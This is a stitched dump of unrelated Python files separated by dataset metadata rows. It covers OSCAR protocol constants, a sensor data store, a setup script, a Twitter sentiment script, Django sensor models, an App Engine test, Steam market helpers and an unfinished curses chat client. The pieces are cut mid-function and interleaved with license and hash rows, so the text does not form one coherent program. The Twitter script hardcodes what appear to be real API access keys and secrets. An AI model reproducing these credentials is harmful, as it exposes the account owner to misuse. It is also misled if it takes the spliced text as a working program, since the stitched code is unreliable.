if self.deferred: self.deferred.errback((error,url))
self.transport.loseConnection()
FLAP_CHANNEL_NEW_CONNECTION = 0x01
FLAP_CHANNEL_DATA = 0x02
FLAP_CHANNEL_ERROR = 0x03
FLAP_CHANNEL_CLOSE_CONNECTION = 0x04
SERVICE_CHATNAV = 0x0d
SERVICE_CHAT = 0x0e
serviceClasses = {
SERVICE_CHATNAV:ChatNavService,
SERVICE_CHAT:ChatService
}
TLV_USERNAME = 0x0001
TLV_CLIENTNAME = 0x0003
TLV_COUNTRY = 0x000E
TLV_LANG = 0x000F
TLV_CLIENTMAJOR = 0x0017
TLV_CLIENTMINOR = 0x0018
TLV_CLIENTSUB = 0x001A
TLV_PASSWORD = 0x0025
TLV_USESSI = 0x004A
CAP_ICON = '\011F\023FL\177\021\321\202"DEST\000\000'
CAP_VOICE = '\011F\023AL\177\021\321\202"DEST\000\000'
CAP_IMAGE = '\011F\023EL\177\021\321\202"DEST\000\000'
CAP_CHAT = 't\217$ b\207\021\321\202"DEST\000\000'
CAP_GET_FILE = '\011F\023HL\177\021\321\202"DEST\000\000'
CAP_SEND_FILE = '\011F\023CL\177\021\321\202"DEST\000\000'
CAP_GAMES = '\011F\023GL\177\021\321\202"DEST\000\000'
CAP_SEND_LIST = '\011F\023KL\177\021\321\202"DEST\000\000'
CAP_SERV_REL = '\011F\023IL\177\021\321\202"DEST\000\000'
| apache-2.0 | 8,640,750,613,813,544,000 | 34.025101 | 151 | 0.53648 | false | 3.380696 | false | false | false |
EnergyID/opengrid | library/storetimeseriesdata.py | 1 | 3097 | # -*- coding: utf-8 -*-
"""
Created by Filip Jorissen
This function stores sensor measurement data. For each sensor two files are created. Sensor.meta contains metadata about the measurements. Sensor.txt contains the actual measurements: only the measurements. The location of the measurement in the file indicates the time at which it was measured. If an existing measurement is already stored, data is appended and overwritten.
TODO: add conditions to check for illegal operations: too long file, ...
"""
import os, io
import json
def storeTimeSeriesData(data, sensor, token, unit):
resultpath="results"
metapath=resultpath +"/"+ sensor + ".meta"
datapath=resultpath +"/"+ sensor + ".txt"
datalength=6
#create results folder if it does not exist
if not os.path.exists(resultpath):
os.makedirs(resultpath)
if os.path.exists(metapath):
# load existing meta file
with open(metapath, 'rb') as fp:
metadata = json.load(fp)
# set write mode to read and overwrite
mode = 'r+b'
#check for inconsistencies
if metadata['sensor'] != sensor or metadata['token'] != token or metadata['unit'] != unit or metadata['datalength'] != datalength:
raise ValueError('Argument is inconsistent with its stored value')
if (data[0][0]- metadata['starttime']) % 60 != 0:
print("Timestamp does not have the correct spacing compared to the initial timestamp! Storage cancelled.")
return
else:
#create new meta file
metadata=dict()
metadata['starttime']=data[0][0]
metadata['sensor']=sensor
metadata['token']=token
metadata['unit']=unit
metadata['resolution']='minute' #need to edit factors '60' below when this is changed!
metadata['datalength']=datalength
metadata['separator']=' '
metadata['edittimes']=[]
# set write mode to write
mode='wb'
#append the unix timestamp to indicate which values were overwritten/added
metadata['edittimes'].append(data[0][0])
#raise an exception when data measurements happened before the currently first measurement of the file
if data[0][0]<metadata['starttime']:
raise ValueError('The added data cannot be appended before the start of the file')
# insert new data at the correct point in the file
entrylength=metadata['datalength'] + len(metadata['separator'])
with open(datapath, mode) as fp:
startIndex=(data[0][0]-metadata['starttime'])/60*entrylength
fp.seek(0, os.SEEK_END)
filesize = fp.tell()
#if the file has been untouched for too long: append dummy data
if filesize < startIndex:
fp.write(("???".zfill(metadata['datalength']) + metadata['separator'])*((startIndex - filesize)/entrylength))
fp.seek(startIndex,0)
for row in data:
fp.write(str(row[1]).zfill(metadata['datalength'])+ metadata['separator'])
# save (updated) meta data file
with open(metapath, 'wb') as fp:
json.dump(metadata, fp)
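# Illustrative call (added; sensor name, token and values are hypothetical).
# Each row is a (unix_timestamp, value) pair; timestamps must be 60 s apart
# and aligned with the first timestamp ever stored for this sensor:
#
#     storeTimeSeriesData([(1388530800, 230), (1388530860, 231)],
#                         'sensor42', 't0ken', 'watt')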
| gpl-2.0 | 5,187,222,242,806,256,000 | 42.027778 | 375 | 0.659671 | false | 4.277624 | false | false | false |
AndyKrivovjas/notes | setup.py | 2 | 1714 | #!/usr/bin/env python
from setuptools import setup, find_packages
# Shamelessly stolen (then modified) from https://github.com/cburgmer/pdfserver/blob/master/setup.py
def parse_requirements(file_name):
import re
requirements = []
for line in open(file_name, 'r').read().split('\n'):
if re.match(r'(\s*#)|(\s*$)', line):
continue
        m = re.search(r"(git(?:\+\w{3})?|https?|svn)://.+#egg=(.*)$", line)
        if m:
            # FIXME: Can't install packages from source repos right now.
            # Distutils can install HTTP-served packages, but skip them
            # for now:
            # requirements.append(m.group(2))
            pass
elif re.match(r'\s*-f\s+', line):
pass
elif re.match(r'\s*-i\s+', line):
pass
else:
requirements.append(line)
return requirements
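# Example (added; hypothetical file contents): a requirements.txt such as
#
#     Django==1.8
#     # a comment
#     -e git+https://example.com/pkg.git#egg=pkg
#
# yields ['Django==1.8'] here; the VCS link is collected separately by
# parse_dependency_links() below.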
def parse_dependency_links(file_name):
import re
dependency_links = []
for line in open(file_name, 'r').read().split('\n'):
if re.match(r'\s*-[ef]\s+', line):
dependency_links.append(re.sub(r'\s*-[ef]\s+', '', line))
continue
m = re.search(r"((?:git(?:\+ssh)|http|svn)://.+#egg=.*)$", line)
if m:
dependency_links.append(m.group(1))
return dependency_links
params = dict(
name='API Example',
packages=find_packages(),
install_requires=parse_requirements('requirements.txt'),
dependency_links=parse_dependency_links('requirements.txt'),
entry_points={
'console_scripts': [
]
},
)
setup(**params)
| mit | -7,590,833,484,005,609,000 | 29.070175 | 100 | 0.547841 | false | 3.631356 | false | false | false |
akhan3674/twitterMapper | project/project/impact.py | 2 | 2804 | #code to save tweets in json
import sys
import tweepy
import json
import csv
from textblob import TextBlob
import os
import time
from datetime import datetime
from threading import Timer
access_key = "2864513512-1JkMkwIRHMjSBLdNgh1zIGiSX2ZJMnhoZZ3b8uR"
access_secret = "vpBlz4E2eSZnw7TVlUAGcmwI4AZ6Hf2Z9CBhin3S7HZSl"
consumer_key = "50n8PRe0MTuC6NyYEqUqnwJsf"
consumer_secret = "ZCFFAbNZfJqwsM1QuPPPBC5ahSX3F8Xsm3PVY4p0PKexO89ygt"
def impactScore(follows, retwt_count, fav_count):
    #Users with many followers will report an impact score close to the # of retweets
    #Users with very few followers have their impact score re-scaled to reflect the minimal penetration of their retweeting
    try:
        impact = float(retwt_count * follows) / (follows + retwt_count + fav_count)
    except ZeroDivisionError:
        impact = 0.0
    return impact
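# Worked example (added): a user with 1,000 followers whose tweet is
# retweeted 50 times and favorited 10 times scores
# (50 * 1000) / (1000 + 50 + 10) ~= 47.2, close to the raw retweet count;
# with only 10 followers the same activity scores (50 * 10) / 70 ~= 7.1.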
def analysis(js):
twt=json.loads(js)
if(twt['lang']=='en'):
txt=twt['text']
#check if this is a retweet
try:
retwt_count=twt['retweeted_status']['retweet_count']
#if it is, return its retweet count
except KeyError:
retwt_count=twt['retweet_count']
#otherwise return the original tweet's retweet count
else:
retwt_count=twt['retweeted_status']['retweet_count']
#do the same for favorites
try:
fav_count=twt['retweeted_status']['favorite_count']
except KeyError:
fav_count=twt['favorite_count']
else:
fav_count=twt['retweeted_status']['favorite_count']
follows=twt['user']['followers_count']
username=twt['user']['screen_name']
blob=TextBlob(txt)
pol=blob.sentiment.polarity
print "Posted by ",username
print "Seen by ",follows," users"
print "Favorited by ",fav_count," users"
print "Retweeted by ",retwt_count, " users"
print "Polarity : ",blob.sentiment.polarity
score = impactScore(follows, retwt_count, fav_count)
print "Impact Score is ",score
#print "Average Polarity: ",avgpol
#print "Magnification : ",retwt_count + fav_count
raw_input("Continue.")
#time.delay(1)
class CustomStreamListener(tweepy.StreamListener):
def on_status(self, status):
print status.text
def on_data(self, data):
analysis(data)
def on_error(self, status_code):
print >> sys.stderr, 'Encountered error with status code:', status_code
return True # Don't kill the stream
def on_timeout(self):
print >> sys.stderr, 'Timeout...'
return True #Don't kill the stream
keyword=raw_input("Please Enter a Keyword: ")
auth=tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_key, access_secret)
api=tweepy.API(auth)
while True:
engine=tweepy.streaming.Stream(auth, CustomStreamListener())
    engine.filter(track=[keyword])
#engine.filter(track=['Nike'])
| mit | 2,873,744,741,846,187,000 | 28.208333 | 121 | 0.729315 | false | 2.838057 | false | false | false |
ResEnv/chain-api | chain/core/models.py | 1 | 7564 | from django.db import models
from django.utils import timezone
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.generic import GenericForeignKey
class GeoLocation(models.Model):
latitude = models.FloatField()
longitude = models.FloatField()
elevation = models.FloatField(null=True, blank=True)
class Metadata(models.Model):
'''Metadata assoicated with a site, a device, or a sensor'''
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
key = models.CharField(max_length=255)
value = models.TextField(blank=True)
timestamp = models.DateTimeField(default=timezone.now, blank=True)
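# Example (added; illustrative, not part of the original models): the generic
# relation lets a Metadata row attach to any resource type, e.g.
#
#     Metadata.objects.create(content_object=some_device,
#                             key='mac_address', value='00:11:22:33:44:55')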
class Site(models.Model):
'''An installation of Chain API, usually on the scale of several or many
buildings. Sites might be hosted on a remote server, in which case the URL
field will point to that resource on that server. If the site is hosted
locally the URL can be blank'''
name = models.CharField(max_length=255)
url = models.CharField(max_length=255, default='', blank=True)
geo_location = models.OneToOneField(GeoLocation, null=True, blank=True)
raw_zmq_stream = models.CharField(max_length=255, default='', blank=True)
def __repr__(self):
return 'Site(name=%r)' % (self.name)
def __str__(self):
return self.name
class Device(models.Model):
'''A set of co-located sensors, often sharing a PCB'''
name = models.CharField(max_length=255)
site = models.ForeignKey(Site, related_name='devices')
description = models.TextField(blank=True)
building = models.CharField(max_length=255, blank=True)
floor = models.CharField(max_length=10, blank=True)
room = models.CharField(max_length=255, blank=True)
geo_location = models.OneToOneField(GeoLocation, null=True, blank=True)
active = models.BooleanField(default=True)
class Meta:
unique_together = ['site', 'name', 'building', 'floor', 'room']
ordering = ["name"]
def __repr__(self):
return ('Device(site=%r, name=%r, description=%r, building=%r, ' +
'floor=%r, room=%r)') % (
self.site, self.name, self.description, self.building,
self.floor, self.room)
def __str__(self):
return self.name
class Unit(models.Model):
'''A unit used on a data point, such as "m", or "kWh"'''
name = models.CharField(max_length=30, unique=True)
def __repr__(self):
return 'Unit(name=%r)' % self.name
def __str__(self):
return self.name
class Metric(models.Model):
'''A metric that might be measured, such as "temperature" or "humidity".
This is used to tie together a set of ScalarData points that are all
measuring the same thing.'''
name = models.CharField(max_length=255, unique=True)
def __repr__(self):
return 'Metric(name=%r)' % self.name
def __str__(self):
return self.name
class ScalarSensor(models.Model):
'''An individual sensor. There may be multiple sensors on a single device.
The metadata field is used to store information that might be necessary to
tie the Sensor data to the physical Sensor in the real world, such as a MAC
address, serial number, etc.'''
device = models.ForeignKey(Device, related_name='sensors')
metric = models.ForeignKey(Metric, related_name='sensors')
unit = models.ForeignKey(Unit, related_name='sensors')
metadata = models.CharField(max_length=255, blank=True)
geo_location = models.OneToOneField(GeoLocation, null=True, blank=True)
active = models.BooleanField(default=True)
class Meta:
unique_together = ['device', 'metric']
def __repr__(self):
return 'Sensor(device=%r, metric=%r, unit=%r)' % (
self.device, self.metric, self.unit)
def __str__(self):
return self.metric.name
class Person(models.Model):
'''A Person involved with the site. Some sensors might detect presence of a
person, so they can reference this model with person-specific
information'''
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
picture_url = models.CharField(max_length=255, blank=True)
twitter_handle = models.CharField(max_length=255, blank=True)
rfid = models.CharField(max_length=255, blank=True)
site = models.ForeignKey(Site, related_name='people')
geo_location = models.OneToOneField(GeoLocation, null=True, blank=True)
class Meta:
verbose_name_plural = "people"
def __repr__(self):
return ('Person(first_name=%s, last_name=%s, picture_url=%s, ' +
'twitter_handle=%s, rfid=%s)') % (
self.first_name, self.last_name, self.picture_url,
self.twitter_handle, self.rfid)
def __str__(self):
return " ".join([self.first_name, self.last_name])
class PresenceSensor(models.Model):
'''An individual sensor. There may be multiple sensors on a single device.
The metadata field is used to store information that might be necessary to
tie the Sensor data to the physical Sensor in the real world, such as a MAC
address, serial number, etc.'''
device = models.ForeignKey(Device, related_name='presence_sensors')
metric = models.ForeignKey(Metric, related_name='presence_sensors')
# unit = models.ForeignKey(Unit, related_name='sensors')
metadata = models.CharField(max_length=255, blank=True)
geo_location = models.OneToOneField(GeoLocation, null=True, blank=True)
class Meta:
unique_together = ['device', 'metric']
def __repr__(self):
return 'PresenceSensor(device=%r, id=%r)' % (
self.device, self.id)
def __str__(self):
return str(self.metric)
# self.metric.name
class PresenceData(models.Model):
'''Sensor data indicating that a given Person was detected by the sensor at
the given time, for instance using RFID or face recognition. Note that this
is also used to indicate that a person was NOT seen by a given sensor by
setting present=False. Typically a Presence sensor should indicate once
when a person is first detected, then again when they are first absent.'''
sensor = models.ForeignKey(PresenceSensor, related_name='presence_data')
timestamp = models.DateTimeField(default=timezone.now, blank=True)
person = models.ForeignKey(Person, related_name='presense_data')
present = models.BooleanField(default=None)
class Meta:
verbose_name_plural = "presence data"
def __repr__(self):
return ('PresenceData(timestamp=%r, sensor=%r, ' +
'person=%r, present=%r)') % (
self.timestamp, self.sensor, self.person, self.present)
def __str__(self):
return '%s %spresent' % (self.person,
'not ' if not self.present else '')
class StatusUpdate(models.Model):
'''Status updates for people, such as tweets, facebook status updates, etc.
This is probably outside of the scope of a general system for tracking
sensor data, but is included here for simplicity with the actual
deployments of DoppelLab. If we deploy this as a generic tool we may want
to strip this out.'''
timestamp = models.DateTimeField(default=timezone.now, blank=True)
person = models.ForeignKey(Person, related_name='status_updates')
status = models.TextField()
| mit | -1,856,304,268,129,593,900 | 38.395833 | 79 | 0.671867 | false | 3.966439 | false | false | false |
billy1380/appengine-pipelines | python/test/util_test.py | 2 | 1433 | #!/usr/bin/env python
"""Tests for util.py."""
import datetime
import logging
import os
import sys
import unittest
# Fix up paths for running tests.
sys.path.insert(0, "../src/")
from pipeline import util
from google.appengine.api import taskqueue
class JsonSerializationTest(unittest.TestCase):
"""Test custom json encoder and decoder."""
def testE2e(self):
now = datetime.datetime.now()
obj = {"a": 1, "b": [{"c": "d"}], "e": now}
new_obj = util.json.loads(util.json.dumps(
obj, cls=util.JsonEncoder), cls=util.JsonDecoder)
self.assertEquals(obj, new_obj)
class GetTaskTargetTest(unittest.TestCase):
def setUp(self):
super(GetTaskTargetTest, self).setUp()
os.environ["CURRENT_VERSION_ID"] = "v7.1"
os.environ["CURRENT_MODULE_ID"] = "foo-module"
def testGetTaskTarget(self):
self.assertEqual("v7.foo-module", util._get_task_target())
task = taskqueue.Task(url="/relative_url",
target=util._get_task_target())
self.assertEqual("v7.foo-module", task.target)
def testGetTaskTargetDefaultModule(self):
os.environ["CURRENT_MODULE_ID"] = "default"
self.assertEqual("v7", util._get_task_target())
task = taskqueue.Task(url="/relative_url",
target=util._get_task_target())
self.assertEqual("v7", task.target)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main()
| apache-2.0 | -4,971,806,801,304,813,000 | 26.557692 | 62 | 0.659456 | false | 3.444712 | true | false | false |
ryanmiao/libvirt-test-API | repos/domain/blkstats.py | 1 | 1762 | #!/usr/bin/evn python
# To test domain block device statistics
import os
import sys
import time
import libxml2
import libvirt
from libvirt import libvirtError
from src import sharedmod
required_params = ('guestname',)
optional_params = {}
def check_guest_status(domobj):
"""Check guest current status"""
state = domobj.info()[0]
if state == libvirt.VIR_DOMAIN_SHUTOFF or state == libvirt.VIR_DOMAIN_SHUTDOWN:
# add check function
return False
else:
return True
def check_blkstats():
"""Check block device statistic result"""
pass
def blkstats(params):
"""Domain block device statistic"""
logger = params['logger']
guestname = params['guestname']
conn = sharedmod.libvirtobj['conn']
domobj = conn.lookupByName(guestname)
    # Start the guest if it is not already running
    if not check_guest_status(domobj):
        domobj.create()
        time.sleep(90)
try:
xml = domobj.XMLDesc(0)
doc = libxml2.parseDoc(xml)
cont = doc.xpathNewContext()
devs = cont.xpathEval("/domain/devices/disk/target/@dev")
path = devs[0].content
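        # (Added note) blockStats() returns a 5-tuple:
        # (rd_req, rd_bytes, wr_req, wr_bytes, errs)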
blkstats = domobj.blockStats(path)
except libvirtError, e:
logger.error("API error message: %s, error code is %s" \
% (e.message, e.get_error_code()))
return 1
if blkstats:
# check_blkstats()
logger.debug(blkstats)
logger.info("%s rd_req %s" %(path, blkstats[0]))
logger.info("%s rd_bytes %s" %(path, blkstats[1]))
logger.info("%s wr_req %s" %(path, blkstats[2]))
logger.info("%s wr_bytes %s" %(path, blkstats[3]))
else:
logger.error("fail to get domain block statistics\n")
return 1
return 0
| gpl-2.0 | 4,589,441,104,892,047,000 | 24.911765 | 83 | 0.61748 | false | 3.603272 | false | false | false |
keiichishima/FX5204PS | contrib/monitor/monitor.py | 1 | 4417 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import pygame
from fx5204ps import FX5204PS
GRAPH_WIDTH = 600
GRAPH_HEIGHT = 100
SCREEN_SIZE = (GRAPH_WIDTH + 200, (GRAPH_HEIGHT + 50) * 4 + 50)
BLACK = (0,0,0)
WHITE = (255,255,255)
RED = (255,0,0)
GREEN = (0,255,0)
BLUE = (0,0,255)
class Graph(object):
def __init__(self, screen, pos, index):
self._screen = screen
self._x = pos[0]
self._y = pos[1]
self._index = index
self._watt_history = [0] * GRAPH_WIDTH
self._avg_history = [0] * GRAPH_WIDTH
self._max_history = [0] * GRAPH_WIDTH
self._scale = 1.0
self._font = pygame.font.SysFont(None, 24)
def _draw_line(self, history, color):
        for t in range(1, GRAPH_WIDTH):
x0 = t - 1 + self._x
y0 = (GRAPH_HEIGHT - history[t - 1] * self._scale + self._y)
x1 = t + self._x
y1 = (GRAPH_HEIGHT - history[t] * self._scale + self._y)
pygame.draw.line(self._screen, color, (x0, y0), (x1, y1))
def draw(self):
self._draw_line(self._max_history, RED)
self._draw_line(self._watt_history, BLUE)
self._draw_line(self._avg_history, GREEN)
pygame.draw.line(self._screen, WHITE,
(self._x, self._y),
(self._x, self._y + GRAPH_HEIGHT))
pygame.draw.line(self._screen, WHITE,
(self._x, self._y + GRAPH_HEIGHT),
(self._x + GRAPH_WIDTH, self._y + GRAPH_HEIGHT))
max_text = self._font.render(
'Max: {0} W'.format(self._max_history[-1]),
True, RED)
self._screen.blit(max_text, (self._x + GRAPH_WIDTH, self._y))
avg_text = self._font.render(
'Avg: {0} W'.format(self._avg_history[-1]),
True, GREEN)
self._screen.blit(avg_text, (self._x + GRAPH_WIDTH, self._y + 30))
watt_text = self._font.render(
'Watt: {0} W'.format(self._watt_history[-1]),
True, BLUE)
self._screen.blit(watt_text, (self._x + GRAPH_WIDTH, self._y + 60))
y_zero_text = self._font.render('0', True, WHITE)
w = y_zero_text.get_rect().width
self._screen.blit(y_zero_text,
(self._x - w, self._y + GRAPH_HEIGHT))
y_max_text = self._font.render(
'{0} W'.format(int(GRAPH_HEIGHT / self._scale)),
True, WHITE)
w = y_max_text.get_rect().width
self._screen.blit(y_max_text, (self._x - w, self._y))
title_text = self._font.render('Port {0}'.format(self._index),
True, WHITE)
self._screen.blit(title_text, (self._x + 20, self._y - 20))
def update(self, watt, watt_avg, watt_max):
self._max_history.pop(0)
self._max_history.append(watt_max)
self._watt_history.pop(0)
self._watt_history.append(watt)
self._avg_history.pop(0)
self._avg_history.append(watt_avg)
max_in_history = max(self._max_history)
if max_in_history > GRAPH_HEIGHT:
self._scale = GRAPH_HEIGHT / max_in_history
else:
self._scale = 1.0
def draw_graph(fx):
pygame.init()
pygame.display.set_caption('FX5204PS Status')
clock = pygame.time.Clock()
screen = pygame.display.set_mode(SCREEN_SIZE)
font = pygame.font.SysFont(None, 24)
graphs = []
for i in range(4):
graphs.append(Graph(screen,
(60, (GRAPH_HEIGHT + 50) * i + 50),
i))
while True:
clock.tick(10)
screen.fill(BLACK)
watt = fx.wattage
watt_avg = fx.wattage_avg
watt_max = fx.wattage_max
for i in range(4):
graphs[i].update(watt[i], watt_avg[i], watt_max[i])
graphs[i].draw()
freq = fx.frequency
volt = fx.voltage
temp = fx.temperature
status_text = font.render(
'Volt:{0} V, Freq: {1} Hz, Temp: {2} C'.format(
volt, freq, temp),
True, WHITE)
screen.blit(status_text, (0, 0))
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
if __name__ == '__main__':
fx = FX5204PS(sumup_interval=10)
fx.start()
draw_graph(fx)
fx.stop()
| bsd-2-clause | 4,841,013,284,531,553,000 | 31.962687 | 75 | 0.518225 | false | 3.186869 | false | false | false |
bukson/steampy | steampy/utils.py | 1 | 7402 | import decimal
import os
import copy
import struct
import urllib.parse as urlparse
import re
from requests.structures import CaseInsensitiveDict
from typing import List
from bs4 import BeautifulSoup, Tag
from steampy.models import GameOptions
def text_between(text: str, begin: str, end: str) -> str:
start = text.index(begin) + len(begin)
end = text.index(end, start)
return text[start:end]
def texts_between(text: str, begin: str, end: str):
stop = 0
while True:
try:
start = text.index(begin, stop) + len(begin)
stop = text.index(end, start)
yield text[start:stop]
except ValueError:
return
def account_id_to_steam_id(account_id: str) -> str:
first_bytes = int(account_id).to_bytes(4, byteorder='big')
last_bytes = 0x1100001.to_bytes(4, byteorder='big')
return str(struct.unpack('>Q', last_bytes + first_bytes)[0])
def steam_id_to_account_id(steam_id: str) -> str:
return str(struct.unpack('>L', int(steam_id).to_bytes(8, byteorder='big')[4:])[0])
def parse_price(price: str) -> decimal.Decimal:
pattern = '\D?(\\d*)(\\.|,)?(\\d*)'
tokens = re.search(pattern, price, re.UNICODE)
decimal_str = tokens.group(1) + '.' + tokens.group(3)
return decimal.Decimal(decimal_str)
def merge_items_with_descriptions_from_inventory(inventory_response: dict, game: GameOptions) -> dict:
inventory = inventory_response.get('assets', [])
if not inventory:
return {}
descriptions = {get_description_key(description): description for description in inventory_response['descriptions']}
return merge_items(inventory, descriptions, context_id=game.context_id)
def merge_items_with_descriptions_from_offers(offers_response: dict) -> dict:
descriptions = {get_description_key(offer): offer for offer in offers_response['response'].get('descriptions', [])}
received_offers = offers_response['response'].get('trade_offers_received', [])
sent_offers = offers_response['response'].get('trade_offers_sent', [])
offers_response['response']['trade_offers_received'] = list(
map(lambda offer: merge_items_with_descriptions_from_offer(offer, descriptions), received_offers))
offers_response['response']['trade_offers_sent'] = list(
map(lambda offer: merge_items_with_descriptions_from_offer(offer, descriptions), sent_offers))
return offers_response
def merge_items_with_descriptions_from_offer(offer: dict, descriptions: dict) -> dict:
merged_items_to_give = merge_items(offer.get('items_to_give', []), descriptions)
merged_items_to_receive = merge_items(offer.get('items_to_receive', []), descriptions)
offer['items_to_give'] = merged_items_to_give
offer['items_to_receive'] = merged_items_to_receive
return offer
def merge_items_with_descriptions_from_listing(listings: dict, ids_to_assets_address: dict,
descriptions: dict) -> dict:
for listing_id, listing in listings.get("sell_listings").items():
asset_address = ids_to_assets_address[listing_id]
description = descriptions[asset_address[0]][asset_address[1]][asset_address[2]]
listing["description"] = description
return listings
def merge_items(items: List[dict], descriptions: dict, **kwargs) -> dict:
merged_items = {}
for item in items:
description_key = get_description_key(item)
description = copy.copy(descriptions[description_key])
item_id = item.get('id') or item['assetid']
description['contextid'] = item.get('contextid') or kwargs['context_id']
description['id'] = item_id
description['amount'] = item['amount']
merged_items[item_id] = description
return merged_items
def get_market_listings_from_html(html: str) -> dict:
document = BeautifulSoup(html, "html.parser")
nodes = document.select("div[id=myListings]")[0].findAll("div", {"class": "market_home_listing_table"})
sell_listings_dict = {}
buy_orders_dict = {}
for node in nodes:
if "My sell listings" in node.text:
sell_listings_dict = get_sell_listings_from_node(node)
elif "My listings awaiting confirmation" in node.text:
sell_listings_awaiting_conf = get_sell_listings_from_node(node)
for listing in sell_listings_awaiting_conf.values():
listing["need_confirmation"] = True
sell_listings_dict.update(sell_listings_awaiting_conf)
elif "My buy orders" in node.text:
buy_orders_dict = get_buy_orders_from_node(node)
return {"buy_orders": buy_orders_dict, "sell_listings": sell_listings_dict}
def get_sell_listings_from_node(node: Tag) -> dict:
sell_listings_raw = node.findAll("div", {"id": re.compile('mylisting_\d+')})
sell_listings_dict = {}
for listing_raw in sell_listings_raw:
spans = listing_raw.select("span[title]")
listing = {
"listing_id": listing_raw.attrs["id"].replace("mylisting_", ""),
"buyer_pay": spans[0].text.strip(),
"you_receive": spans[1].text.strip()[1:-1],
"created_on": listing_raw.findAll("div", {"class": "market_listing_listed_date"})[0].text.strip(),
"need_confirmation": False
}
sell_listings_dict[listing["listing_id"]] = listing
return sell_listings_dict
def get_market_sell_listings_from_api(html: str) -> dict:
document = BeautifulSoup(html, "html.parser")
sell_listings_dict = get_sell_listings_from_node(document)
return {"sell_listings": sell_listings_dict}
def get_buy_orders_from_node(node: Tag) -> dict:
buy_orders_raw = node.findAll("div", {"id": re.compile('mybuyorder_\\d+')})
buy_orders_dict = {}
for order in buy_orders_raw:
qnt_price_raw = order.select("span[class=market_listing_price]")[0].text.split("@")
order = {
"order_id": order.attrs["id"].replace("mybuyorder_", ""),
"quantity": int(qnt_price_raw[0].strip()),
"price": qnt_price_raw[1].strip(),
"item_name": order.a.text
}
buy_orders_dict[order["order_id"]] = order
return buy_orders_dict
def get_listing_id_to_assets_address_from_html(html: str) -> dict:
listing_id_to_assets_address = {}
regex = "CreateItemHoverFromContainer\( [\w]+, 'mylisting_([\d]+)_[\w]+', ([\d]+), '([\d]+)', '([\d]+)', [\d]+ \);"
for match in re.findall(regex, html):
listing_id_to_assets_address[match[0]] = [str(match[1]), match[2], match[3]]
return listing_id_to_assets_address
def get_description_key(item: dict) -> str:
return item['classid'] + '_' + item['instanceid']
def get_key_value_from_url(url: str, key: str, case_sensitive: bool=True) -> str:
params = urlparse.urlparse(url).query
if case_sensitive:
return urlparse.parse_qs(params)[key][0]
else:
return CaseInsensitiveDict(urlparse.parse_qs(params))[key][0]
def load_credentials():
dirname = os.path.dirname(os.path.abspath(__file__))
with open(dirname + '/../secrets/credentials.pwd', 'r') as f:
return [Credentials(line.split()[0], line.split()[1], line.split()[2]) for line in f]
class Credentials:
def __init__(self, login: str, password: str, api_key: str):
self.login = login
self.password = password
self.api_key = api_key
| mit | 232,540,412,038,118,100 | 39.228261 | 120 | 0.644285 | false | 3.436397 | false | false | false |
gu471/winChat_Server | test.py | 1 | 5113 | import socket
import sys
from thread import start_new_thread
from chatClasses import tcpHandler
import time
import curses
screen = curses.initscr()
screen.immedok(True)
curses.noecho()
curses.curs_set(0)
curses.cbreak()
screen.keypad(1)
listenerPort = 5006
promoterPort = 5005
server_address = "127.0.0.1"
chat2Write = []
log2Write = []
Xmessages = []
debug = 80
tosend = ""
closing = False
sending = False
disconnecting = False
listenerConnection = None
promoterConnection = None
uuid = ""
def handleData(data):
log(data, 0)
return
def log(logMsg, verbosity = 0):
global log2Write
if (verbosity < debug):
log2Write.append("[" + str(verbosity) + "]: " + logMsg)
if (verbosity <= 5):
chat2Write.append(logMsg)
def connectSocket(_type, server_address, port):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to server
try:
sock.connect((server_address, port))
log("starting up on %s port %s _ " % sock.getsockname() + _type, 2)
except socket.error, msg:
log(_type + " : Connect Failed. Error Code: {} Error: {}".format(str(msg[0]), msg[1]), 2)
sys.exit()
return sock
def startListener(address, port):
global disconnecting
log("startung listener", 120)
connection = connectSocket("listener", address, port)
tcp = tcpHandler(connection)
global listenerConnection
global uuid
listenerConnection = connection
data = str(uuid)
tcp.write(data)
while True:
try:
data, length = tcp.listen()
log(address + ": '%s'" % data, 20)
if data:
handleData(data)
else:
log(address + ": connection closed _ listener", 2)
break
except socket.error, msg:
if '[Errno 32] Broken pipe' in str(msg):
log(address + ": connection closed _ listener", 2)
else:
log(address + ": '%s'" % msg + " _ listener", 2)
break
uuid = ""
disconnecting = True
def startPromoter(address, port):
global disconnecting
global sending
global tosend
global uuid
connection = connectSocket("promoter", address, port)
tcp = tcpHandler(connection)
global promoterConnection
promoterConnection = connection
uuid, length = tcp.listen()
log(str(uuid) + " | " + str(length), 40)
while not disconnecting:
if sending:
if tosend != "":
log("want to send: " + tosend, 120)
log(tcp.write(tosend), 120)
tosend = ""
sending = False
uuid = ""
connection.close()
log(address + ": connection closed _ promoter", 2)
def write2Box(box, messageList, lastLength, maxLines):
empty = ""
for i in range(1,99):
empty += " "
logLength = len(messageList)
tempWrite = messageList
if logLength > lastLength:
if logLength < maxLines:
maxim = logLength
else:
maxim = maxLines
i = 0
while i < maxim:
box.addstr(i+1, 1, empty)
box.addstr(i+1, 1, tempWrite[logLength - i - 1])
i += 1
return logLength, box
box.refresh()
else:
return lastLength, box
def printScreen():
global tosend
global screen
global log2Write
empty = ""
for i in range(1,99):
empty += " "
logLength = 0
chatLength = 0
lastToSendLength = 0
screen.clear()
chatbox = curses.newwin(22, 120, 0, 0)
chatbox.box()
chatbox.refresh()
sendbox = curses.newwin(3, 120, 23, 0)
sendbox.box()
sendbox.refresh()
logbox = curses.newwin(35, 120, 27, 0)
logbox.box()
logbox.refresh()
screen.addstr(63, 1, "F5 - (re)connect")
screen.addstr(" | END - close")
screen.addstr(64, 1, "F6 - disconnect")
while True:
logLength, box = write2Box(logbox, log2Write, logLength, 35)
box.refresh()
chatLength, box = write2Box(chatbox, chat2Write, chatLength, 20)
box.refresh()
lengthToSend = len(tosend)
if lengthToSend <> lastToSendLength:
lastToSendLength = lengthToSend
sendbox.addstr(1, 1, empty)
sendbox.addstr(1, 1, tosend)
sendbox.refresh()
screen.refresh()
def checkKeyboard():
global tosend
global closing
global sending
global screen
global disconnecting
